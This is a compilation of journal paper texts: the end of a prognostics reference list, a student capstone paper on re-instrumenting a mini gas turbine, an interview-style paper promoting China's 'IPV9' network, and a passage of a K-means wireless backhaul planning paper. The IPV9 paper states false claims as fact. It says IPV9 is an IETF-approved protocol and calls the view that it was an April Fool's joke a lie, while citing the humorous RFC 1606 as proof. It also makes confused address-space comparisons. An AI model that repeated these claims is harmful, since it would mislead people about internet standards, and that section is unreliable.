[30] ADAMS D E. Nonlinear damage models for diagnosis and prognosis in structural dynamic systems[C]. Proceedings of SPIE Conference, 2002: 180-191. [31] CHELIDZE D. Multimode damage tracking and failure prognosis in eletromechanical system[C]. Proceedings of SPIE Conference, 2002: 1-12. [32] RAY A, TANGIRALA S. Stochastic modeling of fatigue crack dynamics for on-line failure prognostics[J]. IEEE Transactions on Control Systems Technology, 1996, 4(4): 443-451. [33] LI Y, KURFESS T R, LIANG S Y.Stochastic prognostics for rolling element bearings[J]. Mechanical Systems and Signal Processing, 2000,14: 747-762. [34] LUO J, BIXBY A, Pattipat I ,K,et al. An interacting multiple model approach to model-based prognostics[C]. in Proceedings of IEEE International Conference on System, Man and Cybernetics, Washington, DC, USA, 2003(1), 189-194. [35] LESIEUTRE G A, FANG L, LEE U. Hierarchical failure simulation for machinery prognostics[C]. A Critical Link: Diagnosis to Prognosis, Virginia Beach, Virginia, USA, 1997, 103-110. [36] FAN J Q, YAO Q W. Nonlinear time series: nonpara-metric and parametric methods[M]. USA: Springer, 2003, 10-27. work_ofmoubrcrjdlrgegtblcgq76ru ---- International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 90 Application of Computational Tools to Analyze and Test Mini Gas Turbine Haifa El-sadi* , Anthony Duva Mechanical Engineering and Technology Faculty of Engineering and computer science Wentworth Institute of Technology Boston, MA, USA Corresponding author Email: elsadih@wit.edu Abstract. Performance analysis and testing of the Mini Gas Turbine was carried out in Wentworth Institute of Technology’s Thermodynamics Laboratory. The computational tool allows students to focus on more design-oriented problems. Furthermore, students had the ability to see immediate results to variations of the design conditions as well as different parameters that would affect the mini turbine. This project was carried out as a senior design project (Capstone), the students updated the existing data acquisition system, writing a new data acquisition program in LabVIEW, installing new pressure and temperature sensors, and performing a first and second law of thermodynamics analysis on the engine in Engineering Equation Solver. In order to update the existing data acquisition system, new NI SCB-68 connector blocks were implemented along with NI USB-6251 terminals. The new hardware is operated through a LabVIEW program running on a new laptop designated and mounted to the mini jet turbine housing. Instrumentation, testing, and calibration are the three main milestones for this project As a result, The Inlet Mass Flow Rate numeric indicator value is calculated, not measured. The calculated value is dependent on the measured values of Compressor Inlet Temperature (T1), Compressor Inlet Static Pressure (Ps), and Compressor Inlet Dynamic Pressure (Pt-Ps). However, the pressure, temperature and thrust were tested as a function of RPM. The mini turbine engine is ready to be used in student experimental settings. Feedback from students proves that the use of different tools significantly enhances the student learning experience and encourages the students to use different theory from different courses, make the course more dynamic, and motivate the students to learn the material. Keywords: LabVIEW, Engineering Equation solver (EES), Mini-turbine, Pressure 1. Introduction The turbine engine discussed throughout this research is a self-contained turbojet engine.This engine operates on a Brayton cycle. The Brayton cycle depicts the air-standard model of a gas turbine power cycle. A simple gas turbine is comprised of three main components: a compressor, a combustor, and a turbine. According to the principle of the Brayton cycle, air is compressed in the compressor. The air is then mixed with fuel, and burned under constant pressure conditions in the combustor. The resulting hot gas is allowed to expand through a turbine to perform work. Most of the work produced in the turbine is used to run the compressor and the rest is available to run auxiliary equipment and produce Application of Computational Tools to Analyze and Test Mini Gas Turbine 91 power [1]. Gas turbine engines include internal passages which serve to channel the cooling air from compressors to the different components to be cooled. The research on the flow in a corotation radial inflow cavity was pioneered by Owen et al. [2]. They used integral momentum techniques for flows in a rotating cylindrical cavity. Firouzian et al. [3, 4] studied the flow and heat transfer in the cavity. Their results revealed the complicated source-sink flow feature in a radial inflow rotating cavity. One of the concerns in turbomachine is the pressure loss in the cavity; different ways to minimize the pressure loss have been explored. Chew et al. [5] has used fins to reduce the pressure loss. On the other hand, X. Liu [6] has studied the flow in a corotation radial inflow cavity between turbine disk and coverplate. Also, the flow field in a preswirled cooling air supply to a turbine rotor has been investigated by Oliver et al. [7, 8]. An analysis on this engine provides important performance characteristics such as thrust, compressor performance, turbine performance (work and power, expansion ratio, turbine efficiency), combustion/ emission analysis, and overall isentropic efficiency. In order to perform an analysis on this engine, several quantities at specific locations are needed. Sensors are instrumented on this engine at the compressor inlet, compressor outlet, turbine inlet, turbine exit, and exhaust to collect data on the temperature and pressure at each location. This data is then used to perform a performance analysis on the engine. In addition, there are sensors on this engine to monitor thrust, RPM, and fuel flow rate. Shown below in Figure 1 is a cross section of the engine with main components labeled. Figure.1 Turbine Engine Layout (Brayton Cycle) Figure 2 below shows the location of each temperature and pressure being measured on the engine. International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 92 Figure.2 Engine Instrumentation Locations Shown below in Table 1 are the specifications of the engine. Table 1 Engine Manufacturer Specifications Manufacturer Turbine Technologies, Ltd. Model Number 2000DX Max. RPM 90,000 Max. Exhaust Temperature 720 C Pressure Ratio 3.4:1 Specific Fuel Consumption 1.18 lb./lb.-hr T h e T u r b i n e T e c h n o l o g i e s M i n i G a s T u r b i n e i n t h e W e n t w o r t h I n s t i t u t e o f T e c h n o l o g y thermodynamics lab is in great need of an instrumentation overhaul. Due to the high cost of replacing the data acquisition system completely, our team will be replacing it ourselves. The current DAQ system is outdated and incompatible with current software on the computer it is paired to. A new set of DAQ hardware will be paired with a new computer running a LabVIEW program to collect the data. Our team’s goals also include calibration of pressure transducers and thermocouples for accurate measurement. Our team will then run a 1st and 2nd law of thermodynamics on the system using Engineering Equation Solver (EES). The mini gas turbine in the thermodynamics lab is a fantastic resource that is going un-used. Many students can benefit from the mini turbine’s technical sophistication. Benefits include but are not limited Application of Computational Tools to Analyze and Test Mini Gas Turbine 93 to technical understanding, conceptual understanding, and practical application. With the recent creation of the Aerospace Engineering Minor at Wentworth, this machine could open the eyes to many young engineers and give them the ability to have a future in the aerospace industry. Turbine propulsion is used on various aircraft, but dominates the commercial jet and military jet industries. The main problem of this project is to overhaul the instrumentation of the mini gas turbine and have it ready to be run for students. Instrumentation, testing, and calibration are the three main milestones for this project. A technical lab will be produced for thermodynamics students to run. 2. Instrumentaion Figure 3 below shows the laptop system mounted and installed. Figure.3 Laptop and Monitor Installed the new DAQ has several additional components which are much larger than the old system a much larger mounting bracket was necessary. After modeling all of the current system components in SolidWorks, a sheet metal bracket was designed to fit all of the DAQ components without interfering with any of the existing surrounding components. Figure 4 below shows the design of the new DAQ setup. Figure.4 DAQ Components Installed International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 94 During the course of this project, there were many sensors that needed to be changed or added. The preexisting DAQ system was capable of collecting temperature and pressure readings from the various mini-turbine engine stages; however, there was room for improvement. One of the main additions made to the instrumentation was implementing a new pressure transducer to read the static pressure at the inlet of the nozzle. The pitot-static mast style device can be seen below in figure 5: Figure.5 Inlet Pitot Tube Current Set-Up The basis of this project is to transition the new hardware and supported LabVIEW software. The hardware chosen for the task are the NI SCB-68 and NI USB-6251. Two of each have been implemented in the DAQ system. While attempting to calibrate the thrust strain gauge, significant noise to the NI chassis was experienced. The pre-existing set-up had the wires from the strain gauge splitting between the meter and the NI chassis. While the out-put signal from the strain gage was filtered through the DP25-S, it was not filter through the NI chassis. To remedy the issue, the DP25-S was replaced with a DP25-S-A which had the correct analog signal output. With the new signal analog signal output, there was no noise experienced from the thrust strain gage and meter. Below the new meter can be seen: 3. Testing Figure 6. LabVIEW Data Acquisition Front Panel User Interface (Plot Tab） In order to calculate the Inlet Mass Flow Rate to the turbine engine, the static pressure is needed. The static pressure is obtained by connecting a pressure transducer directly to the static pressure port on the inlet pitot tube. Next, the density of the air is calculated using this static pressure. The air velocity is calculated next using the Dynamic Pressure which is the difference between the total pressure and the static pressure. The Mass Flow Rate is finally obtained knowing the density, velocity and cross sectional area of the inlet nozzle at the location of the pitot tube. This calculation is performed in the LabVIEW program (Figure 77). See following report section for mass flow rate governing equations. The fuel flow rate is determined from measuring the fuel pressure. If the fuel pressure as well as the fuel properties are known, the flow rate can be determined. The Inlet Mass Flow Rate numeric indicator Application of Computational Tools to Analyze and Test Mini Gas Turbine 95 value is calculated, not measured. The calculated value is dependent on the measured values of Compressor Inlet Temperature (T1), Compressor Inlet Static Pressure (Ps), and Compressor Inlet Dynamic Pressure (Pt-Ps). Using Express Formula functions, the density of the air is first calculated, then the velocity of the air is calculated, and finally the Inlet Mass Flow Rate can be calculated. The following equations are contained within these functions for Density (ρ), Velocity (v) and Mass Flow Rate (ṁ). Where, A = Compressor Inlet Area R = Ideal Gas Constant for Air Figure 8 shows the inlet mass flowrate vs. RPM Figure.7 Mass Flow Rate Calibration Figure.6 LabVIEW Block Diagram International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 96 4. Engineering Equation Solver (EES) One of the critical tasks was to create a program in EES which analyzes the engine using the first and second laws of thermodynamics. Ideally this program would be displayed on the second monitor so you can take the data directly from LabView and plug it into the EES program. After plugging in the different temperatures and pressures as inputs in the EES program, it will calculate the compressor efficiency, turbine efficiency, overall efficiency of the engine and the thrust of the engine. A diagram window interface was created in EES to make it easy for the user to run the program without understanding the entirety of the code. Figure 12 below shows the equations window section of the EES program. Figure.12 EES code Figure.9 Engine Testing Data Plot – Thrust vs RPM A sample set of data collected from an engine test run is shown in figure 9 through Figure 11. These plots contain important characteristics of the engine such as the relationship between engine RPM and Thrust, Temperature, Inlet Mass Flow Rate, and Pressure. Figure.8 Engine Testing Data Plot – Inlet Mass Flow Rate vs RPM Application of Computational Tools to Analyze and Test Mini Gas Turbine 97 5. Conclusion This paper explored the use of computational tools to enhance the students’ understanding of the different gas turbine engine processes and apply the theory such as conservation of mass and energy which were learned in different courses such as Thermodynamics and fluid mechanics. The computational tool such as EES allows the students to focus on the fundamental concepts of energy equation and second law of thermodynamics to yield quicker final results. The completion of this capstone project produced quality and timely task completion. The mini turbine engine is now ready to be used in student experimental settings. Each data acquisition component of the system is calibrated including all thermocouples and pressure transducers, RPM measurement and thrust measurement. The LabVIEW program will be used for real time data display and data acquisition of the complete run cycle of the system. Using this data exported to Excel by the LabVIEW program, these values can be inputted into the first and second law of thermodynamics EES program to determine the efficiencies of the compressor, turbine, and the overall system as well as the work done by the system in BTU/hr. The senior students completed their tasks and sub-tasks and achieved their final goal. These tasks and sub- Figure.11 Engine Testing Data Plot – Pressure vs RPM Figure.10 Engine Testing Data Plot – Temperature vs RPM International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 98 tasks include but are not limited to preliminary research and component identification, mounting of a new laptop arm and laptop, design and manufacturing of a mounting bracket for the DAQ hardware, an EES program, a DAQ and user-friendly display LabVIEW program. It can be concluded that using senior students. Feedback from students, proved that the use of computational tools significantly enhances the student learning experience while motivating the students to learn the different mini turbine processes. References [1] Moran, Michael J., and Howard N. Shapiro. Fundamentals of Engineering Thermodynamics. Seventh ed. New York: Wiley, 2011. Print [2] [1] Owen, j.m., Pincombe, J.R. and Rogers, R.H., “Source-sink flow inside a rotating cylindrical cavity” , J. Fluid Mech., vol.155, 1985, 233-265. [3] Firouzian, M.O., Owen, J.M., Pincombe, J.R. and Rogers, R.H., “Flow and heat transfer in a rotating cylindrical cavity with a radial inflow of fluid. Part 1: The flow structure”, Int. J. Heat and Fluid Figure.12 EES code Application of Computational Tools to Analyze and Test Mini Gas Turbine 99 Flow, vol.6, 1985, 228-234. [4] Firouzian, M.O., Owen, J.M., Pincombe, J.R. and Rogers, R.H., “ Flow and heat transfer in a rotating cylindrical cavity with a radial inflow of fluid. Part 2: Velocity, pressure and heat transfer measurements”, Int. J. Heat and Fluid Flow, vol.7, 1986, 21-27. [5] Chew, J.W., Farthing, P.R., Owen, J.M. and Stratford, B., “ The use of fins to reduce the pressure drop in a rotating cavity with radial inflow”, J. Turbomachinery, vol. 111, 1989, 349-356. [6] X. Liu, “Flow in a corotation radial inflow cavity between turbine disk and coverplate”, Int. Gas Turbine & Aeroengine Congress & Exhibition, Orlando, Florida, 1997. [7] Oliver Popp, Horst Zimmermann, and J. Kutz, “ CFD-analysis of coverplate receiver flow”, Int. Gas Turbine & Aeroengine Congress & Exhibition, Birmingham,UK,1996. [8] Haifa El-sadi, Grant Guevremont, Remo Marini, Sami Girgis, “CFD Study of hpt blade cooling flow supply systems”, ASME Turbo Expo 2007: Power for Land, Sea and Air,May 14-17, 2007, Montreal, Canada work_ofvzhtalhnfxfbyktffx6bud4a ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-030 73 Interview with the Inventor of the Future Network IPV9 Guoshao Chen School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China E-mail: 1825247141@qq.com Wang Yubian Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street, Gomel, 246653, Republic of Belarus E-mail: alika_wang@mail.ru Abstract—With the rapid development of the Internet, from the PC terminal to the mobile terminal, from big data systems to intelligent hardware, technology has shown the unique charm of the Internet. With the development of the Internet, the network information security and network sovereignty issues involved have become increasingly prominent. Therefore, only in an environment of security, equality, and mutual assistance can the Internet play its due economic and social value. The emergence of a new generation of Internet IPV9 marks a key step for China to move towards an autonomous and controllable future network. IPV9 is to further safeguard national network sovereignty on the basis of fully guaranteeing network information security. But the defamation of IPV9 still exists. Recently, in order to further clarify the facts, we hereby interviewed Xie Jianping, the inventor of the Decimal Network, to conduct an in-depth discussion on the new generation Internet IPV9. Keywords-IPV9; Future network; Decimal Network I. INTRODUCTION The core of the current Internet (also known as the Internet) technology is IPv4 and IPv6, and its technical core is completely controlled by the United States. On December 14, 2017, the US Federal Communications Commission (FCC) officially abolished the net neutrality rule, making the Internet with obvious political color and posing a serious threat to Internet applications in various countries. The address space of the IPv4 protocol is 2 to the power of 32. Due to the insufficient estimation of the development trend of the Internet in the early stage of Internet, the insufficient setting of the address space length caused the unreasonable IP allocation. By 2010, there were no addresses to allocate. In theory, IPv6 has 2 128 addresses, but only one eighth of the addresses can be assigned to end users, so there are only 2 125 addresses, which is equivalent to 10 37 . The 128 bar code in the Internet of Things is already 10 128 , which cannot be covered, so IPv6 also has certain limitations. Since the establishment of the Decimal Network Standards Working Group of the Ministry of Industry and Information Technology in August 2001, Shanghai Decimal Network Information Technology Co., Ltd. has conducted more than 20 years of research in the future network field, developed a complete network framework system, and completed IPV9 with independent intellectual property rights. The patent obtained by IPV9 (2001, patent number CN98122785) has been recognized by many countries including China, the United States, the United Kingdom, Russia and other countries. This International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 74 innovative and internationally strategic new achievement has been vigorously endorsed by the Ministry of Industry and Information Technology, the National Standards Committee and other ministries Supported the establishment of a second network system other than the United States. II. FUTURE NETWORK IPV9 In Dr Zhang's article, IPV9 is the legal version of the American IETF. The IPV9 is a version that the United States has publicly declared unsuccessful, but has never abandoned. Figure 1. IPV9 EV001 As early as 1994, the United States admitted that IPV6 address length was inadequate and announced that the old system was behind The Times, and began working on IPV9, but it was never successful. At present, IPV10 is being developed in the United States. What is the concept of IPV10? Because IPV4 and IPV6 are not compatible, IPV10 solves the problem of communication between IPV4 and IPV6 mutual group machine, and the address length should reach 256 bits. The main reasons for the insufficient length of the IPV6 address are as follows: First, the length of the current bar code EAN·UCC on the Internet of Things is 10 to the 128th power, while IPV6 can only achieve 10 to the 32th power. Second, ISO has clearly mentioned that the length of the new future network should exceed 128 bits. Third, the United States is developing a new network (IPV10) with 256-bit IP addresses. This is the same as the NEW IP proposed by Huawei, which is unanimously inclined to the viewpoint that the IPV6 address length is not enough. Evidence No. 1 of IPV9 EV001 indicates that the statement “IPV9 is a joke on April Fool's Day ” disseminated by Shenyang, Fang Zhouzi and a few academicians International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 75 and authoritative network experts in China is a lie. IPV9 is a protocol with an official version number and a specific technical background. The original technical documentation for IPV9, TUBA, was published by IETF two years before IETF1606 and IETF1607. IPV9 is a technology officially approved by the IETF and issued with a version number. IPV9 is not a closed network, but is connected to the Internet in foreign countries. IPV9 can completely build a pure IPV9 network, and then connect to the old network through a gateway. The relationship between the future network and the Internet is like the relationship between the new highway and the old highway, which can operate independently or be interconnected. IPV9 information can be used in IPV9 network content circulation, digital domain name is owned by China's own root server, in foreign countries to cut off the network channel and stop the exchange of top-level domain (TLD), the use of digital domain users are not affected. In the event of foreign intervention or accident to cut off the overseas access to the Internet, China's network can still maintain a safe and stable operation. The IPV9 address of the future network is basically 256 bits long, and can be expanded to 1024 and 2048 bits. It can be expressed in simplified decimal or variable length to meet various application scenarios, while IPv6 address only 48, 64, 128 bits version and incompatible. The future network IPV9 effective address length 256-2048 bits, can be independently and bidirectionally addressed, and can meet the needs of the Internet of Things and digital currencies. The address block architecture of IPv6 restricts its cross-city mobile and bidirectional addressing. It must deduct the 32-bit network number of each international and operator. The effective URL is only 64 bits, which cannot meet the needs of the Internet of Things mobility and the number of URLs. Therefore, IPV9 is a milestone for China to maintain national network sovereignty, guarantee the security of network information, break the monopoly of the US Internet, and promote the rapid development of a new generation of Internet with independent control and secure interconnection. III. FUTURE NETWORK PATENT China IPV9 has found a way to implement it, applying for patents and copyright protection. And there are many innovations in the concept of technology, and the development achievements have been remarkable. The main results are as follows: First, the program is complete. China's future network IPV9 has formed a complete technical solution, including many core technologies, such as naming and addressing technology, three-and-four-layer composite architecture technology, character direct routing technology, terminal analysis technology, compatible interoperability technology and new network security technology. Second, it is well equipped. China has developed the key equipment for the future commercial application of network IPV9, including root server, core router, parsing server and so on. Third, the standard is leading. In the domestic standard, the country has issued a number of technical standards based on decimal network and IPV9. Internationally, the core technology concept of IPV9 has been adopted into the international standard, and many technical solutions are about to apply to the international standard for approval. It is shown in figure 2. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 76 Figure 2. Official document of the future network Domestic standards for future Networks (ISO-29181/IPV9) include: Electronic industry standard of the People's Republic of China SJ/T-11603-2016, SJ/T-11604-2016, SJ/T-11605-2016, SJ/T-11606-2016, SB/T-10530-2009, SJ/T-11271-2002. It is shown in Figure 3. Future Network IPV9 has obtained 8 patents in China (2 inventions, 6 utility models). The method by which the computer assigns the address of the computer by the whole decimal algorithm (patent no.: ZL001351826). A method for the uniform compilation and distribution of addresses of networked computers and intelligent terminals (patent No.: ZL001168738). The method of assigning addresses to computers on the Internet by using full-digit code (patent No.: ZL981227856). Guidance code and its application system for goods and Commodity Code networking (patent No.: ZL200510027910X). A networked tax control system and its application method (patent No.: ZL2004100160308). Digital remote video monitoring system device (patent No.: ZL2004200207687). The future network has also been awarded a US patent. It is shown in Figure 4. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 77 Figure 3. Future Network China Standard Content International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 78 Figure 4. IPV9 US Patent Certificate IV. TYPICAL APPLICATIONS OF IPV9 At present, my country has built demonstration projects of IPV9 address space, root domain name server and IPV9 backbone optical cable system in Beijing, Shanghai, Shandong, Jiangsu and Zhejiang, and is building a national military-civilian fusion IPV9 backbone optical cable and gateway bureau. The IPV9 network has now completed multi-point testing applications and has obtained good test data. At present, China has established an "N" financial root domain name server which supports 256 bit address space. It has laid a foundation for the unified format of digital currency in China and even the whole world. In the process of issuing digital currency, the root domain name server and the top-level domain name server in the United States can avoid the management control of the overall digital currency issuing network communication system in China. China's digital currency network communication system must have a financial root domain name server parallel to the United States and a "chn" national top-level domain name server and its supporting digital currency electronic vouchers, payment processing and other security service facilities, and adopt advanced advanced authentication before communication Technology and supporting domestic encryption technology International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 79 completely solve the problem of financial information security, ensure China's financial stability, and safeguard national sovereignty. At the same time, the establishment of a third-party platform for digital currency and physical currency conversion, electronic bills and electronic business path and identity and qualification certification based on the decimal network root domain name server, and unified national prior identification and management. The project of Healthy Tai 'an IPV9 big data platform relies on the existing backbone optical cable and user transmission and access network of Tai 'an Branch of Shandong Radio and Television Network Co., LTD., and USES IPV9 network technology for upgrading and reconstruction. The network covers medical and health institutions at city, county, township and village levels as well as Tai’an City financial bureau, medical insurance bureau and administrative departments of Tai’an. The bandwidth meets the requirements of big data business of Tai’an health and sustainable expansion, and the compatible and safe operation of IPV9 network and IPV4 network is realized. V. CONCLUSION IPV9 is a new generation network architecture researched and developed by Chinese scholars. It is fully autonomous and controllable, with large address space and safe high-speed large code stream transmission. The distributed analysis of the network has low latency and is compatible with the current Internet system. Future Network is a method of empty cup design and new architecture to develop a Network system independent of the existing Internet to achieve a more secure, more economical, faster and more flexible Network. The future network will be developed in 15 years and put into preliminary commercial use around 2020. REFERENCE [1] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [2] S.Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 （IPv6）-Specification, RFC-1883, 1995.12. [3] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks. RFC-2464, 1998.12. [4] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [5] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. work_og2bcwliw5cifgbk5z4dlw35pm ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 61 Application of Wireless Return Topology Planning Based on K-Means Yang Weixia Xi'an Technological University School of computer science and engineering Shaanxi 710021, Xi'an, China e-mail:1195862787@qq.com Xu Fei Xi'an Technological University School of computer science and engineering Shaanxi 710021, Xi'an, e-mail:China29112462@qq.com Li He Xi'an Technological University School of computer science and engineering Shaanxi 710021, Xi'an, China e-mail:1003294436@qq.com Chen Yuan Xi'an Technological University School of computer science and engineering Shaanxi 710021, Xi'an, China e-mail:1677622439@qq.com Abstract—With the development of communication technology and the general trend of interconnection and intercommunication, people's demand for high-quality information and communication is increasing day by day. Therefore, the intensive deployment of base stations has become the development trend of the construction of a new generation of communication network. In this paper, in order to solve the urban and rural electric scenarios such as traditional transport unreachable problem, on the basis of the operator site cost at the same time, keep the quality of signal transmission, give full play to the advantages of the traditional planning concept and artificial intelligence algorithm, integrated "pieces", "step by step optimization", "local optimal", "the results of reverse", such as ideas, set up a wireless back mathematical analysis model of network topology programming problem. The purpose of this paper is to reduce the cost and reduce the return path loss. Aiming at the lower cost problem, a local optimal model is constructed. First division, through the K - Means algorithm is divided into K, for each region is also based on K - Means algorithm is further split into its n tribal groups, limited each tribal group one and only one host station, recently to tribal group of perimeter centroid position of butterfly stand stand as a host, the rest of the site as a child, according to the type of tribal group of judge whether the number of sub station meet the qualification, if not satisfied, change the K value and the adjustable radius, respectively, until meet the qualification, the best solution is calculated. For the lower return path loss problem, if only the loss problem is considered, the loss result is obtained by changing the distance between the first jump and the second jump based on the model. Through the comparison of the results, the best scheme is obtained when only loss is considered. Keywords-Wireless Return; Base Station Deployment; K- Means Algorithm; Piecemeal Optimization I. THE PROBLEM BACKGROUND With the rapid development of mobile communication network, various mobile terminal devices and applications affect every aspect of people's life. However, the current network information construction faces some problems: the acceleration of urban construction makes the urban environment more and more complex, which leads to the formation of many wireless signal black spots and weak coverage areas in densely populated urban areas; Some urban residents misunderstand the construction of base stations, believing that the harm of base stations into the community is serious, which makes the deployment of base stations significantly more difficult, and the phenomenon of station demolition is also increasing. Due to the difficulties in property coordination in many communities, the arrival rate of the last kilometer of transmission fiber deployment is low. In literature [1], the deployment principles, coverage characteristics, station type selection and comparison with conventional micro-base stations are studied, and the actual deployment scheme of Relay micro-base station is proposed, and the effectiveness of the scheme is verified. Literature [2] focuses on analyzing the principle and characteristics of Relay technology, and deeply studies the deep coverage of urban areas and the wide coverage of rural areas and roads. Literature [3] studies the impact of Relay technology on the wireless network structure, wireless network planning and the development of wireless network planning tools. Literature [4] discussed whether the broadband wireless communication system DOI: 10.21307/ijanmc-2019-048 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 62 can be deployed under the condition of non-line-of- sight NLOS. Can you provide reliable high bandwidth connections? Is there a reliable high bandwidth NLOS solution available? The above literature mainly starts from the theory, while this paper mainly studies the base station deployment plan from the actual situation, establishes the model and conducts the feasibility verification, and finally achieves the goal of low cost and small path loss to improve the user experience. II. MATHEMATICAL MODEL A. The known conditions The location distribution of candidate sites in this paper is known, and there are 1000 sites. Only the mutual location and topological relationship between sites are considered, that is, only the distance between the host station and the sub-station is considered. The integrated cost of various station types, including the integrated cost of the host station, the integrated cost of the sub-station, and the cost of satellite equipment are also known. Total cost = host station cost * number of host stations + substation cost * number of substations + satellite cost * number of satellites Average cost = total cost/number of sites in the region The topological relationship between sites meets the following conditions: 1) The distance between the host station and the first-level sub-station is no more than 20km, and the distance between sub-stations is no more than 10km. 2) The site is divided into two types: RuraStar (one sector) and butterfly station (two sectors). 3) If it is the host station, the maximum number of sub-stations at level 1 in each sector is 4, and the total number of sub-stations does not exceed 6. 4) Regardless of the coverage direction of butterfly station sector; 5) The limit of microwave communication distance between host stations is 50km. 6) Wireless return connection is adopted between host station and sub-station and between sub-stations; 7) Each sub-station can only have two wireless back links at most, that is, the upstream and downstream links are unique; 8) The relation diagram between host station and substation is similar to the tree diagram. 9) There is only one path between any substation and the host station, and the number of hops is less than 3. 10) There is a one-to-many relationship between the satellite and the host station. A host station group with less than 8 satellites can share a satellite. The wireless back propagation is affected by the NLOS scene, and the free space propagation is adopted to simplify the calculation. The model estimates the path loss between sites, and the formula is as follows: PL=32.5+20*lg（D）+20*lg（F） Where, PL stands for path loss, D is the distance between the two stations, the unit is km, F is the transmission frequency, the default is a constant, 900MHZ. Average system loss = sum of all wireless return connection losses/number of wireless return connections Level 3 substation After the firs t hop distance is less than or equal to 20km, the hop distance is les s than or equal to 10km, and the hop count is less than or equal to 3. Level 1 substation Th e maximum number of s ub-station acces ses per sector of the host station is 4, and the maximum number of sub- stations is 6 Th ere is only one path between the substation and the host station. Host station Level 2 substation Maximum communication distance between host stations is 50km Figure 1. Schematic diagram of connections between sites B. Question assumptions 1) Suppose RRN(eRelay Remote Node) wireless transmission device as a substation; 2) It is assumed that DeNB, as the host station, can be divided into 1 to 3 host cells, covering different directions. 3) It is assumed that the effects of terrain blocking and ordinary mobile phone access blocking on the back transmission quality are not considered. 4) It was assumed that ReBTS interference was not considered. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 63 5) The interference of adjacent base stations is not considered. 6) It is assumed that the first jump of cascade between base stations is not greater than 20km, and then it is not greater than 10km. 7) Assuming that the sector coverage direction of butterfly station is not taken into account, the maximum number of sub-stations is 12. 8) It is assumed that the maximum number of RuralStar stations is 4. 9) It is assumed that the host stations are connected by microwave and the maximum communication distance is 50KM. 10) Suppose that the host station and the sub-station and the sub-station are connected by wireless back transmission. 11) It is assumed that a substation can only have one host station, and there is only one path to the host station, and the path contains no more than 3 hops. 12) It is assumed that there can be no more than 2 wireless return connections between each substation. 13) Assuming that only one satellite of any host station is responsible for the back transmission, host stations connected by slices can share one satellite, and each satellite can only bear the back transmission data of 8 host stations. 14) It is assumed that the total number of host stations is unlimited. 15) Assuming that the maintenance costs of the host station, substation and satellite are not taken into account. 16) Assuming that other factors are not considered, the spherical model is transformed into a plane model. 17) It is assumed that the path consumption is estimated by the free space model without considering the influence of NLOS. C. Meaning of the symbols TABLE I. NOTATION TABLE symbols Meaning LOS Line-of-sight transmission capability ROI Return on investment NLOS Non-line-of-sight transmission capability RRN The infinite return device of the infinite return scheme RN Relay station UE Ordinary mobile phone PL Path to the consumption APL Average path consumption D Site spacing F Transmission frequency R Radius of the earth S The distance between the spheres ɑi I point longitude β i I point the dimension i Base station identification Xi The host site Yi The child site Zi Satellite point C The overall cost FD The first jump distance ND After each jump distance FXi Butterfly host station RXi Star host station WL Microwave connections between host stations WBL Wireless return connection between host station and sub-station and between sub- stations JS The number of hops from a substation to a host station Ceil The function that rounds up D. The establishment and solution of the model 1) Analysis of problems In combination with table 2, the cost of satellite > host station costs > sub station costs, to achieve the overall cost of wireless return part of the station is lower, the first need to ensure the minimum number of satellites, that is, as far as possible 8 host stations share a satellite; Secondly, the number of host stations should be kept as small as possible. Since butterfly station has one more sector than RuraStar, the maximum access number of sub-stations is 12, covering a wider range, so butterfly station should be selected as the host station as far as possible. In real life, the deployment of the site is usually partitions, according to the "division", "local optimum, and the thought of" step by step optimization ", first by using K Means clustering algorithm, all the site is divided into K classes, each International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 64 kind of belonging to a satellite, then each category divided into n host station tribal groups, the mathematical model established between K, n, and cost, butterfly site closest to the center of mass as a host station, and then judge the location of the relationship between sub station with the host station whether meet the constraints of distance, the host station to station traverse connection relations, Select the connection path with the most extensive coverage, and get the scheme with lower cost.If a plane carrying a large number of passengers is replaced by a small passenger plane some passengers will overflow, and some passengers will not be able to register because of the number of passengers. For path loss, only consider the child stand back part of the path loss, and not to consider path loss between host station, just meet the distance limit, so can be achieved by increasing the number of the host station to smaller path loss, when the host stand for most time, path loss minimum, but also will increase the cost of satellite transmission. If the effective distance of wireless return transmission is limited, that is, the distance between the substation and the host station and between the substations is limited, then in theory, a low path loss can be obtained. By means of the idea of "result inverse", the model is modified, and then the modified station model is deduced, and the lowest cost scheme, namely the optimal solution of the problem, is finally screened out. 2) Problem model establishment a) Establishment of objective function Total cost: number of host stations * host station cost + number of substations * substation cost + number of satellites * satellite cost. The number of satellites is equal to Ceil (number of host stations /8), and Ceil () indicates the upward direction.  50510M  ZYXinC   Where: C represents the total cost under the topology; X represents the number of host stations; Y represents the number of sub-stations; Z is the number of satellites. TABLE II. SHOWS THE COSTS OF VARIOUS MODES OF TRANSMISSION IN WUSD transport cost host station 10 child station 5 satellite 50 b) Establishment of constraint conditions:  The distance of the first hop is 20km, and that of each subsequent hop is 10km.  Site includes RuralStar and butterfly station two different station type; Among them, RuralStar contains 1 sector in total, and butterfly station contains 2 sectors in total. If the site is the host station, the maximum number of sub-stations at the first level of each sector is 4, and the maximum total number of sub-stations is 6. In order to simplify the problem, the sector 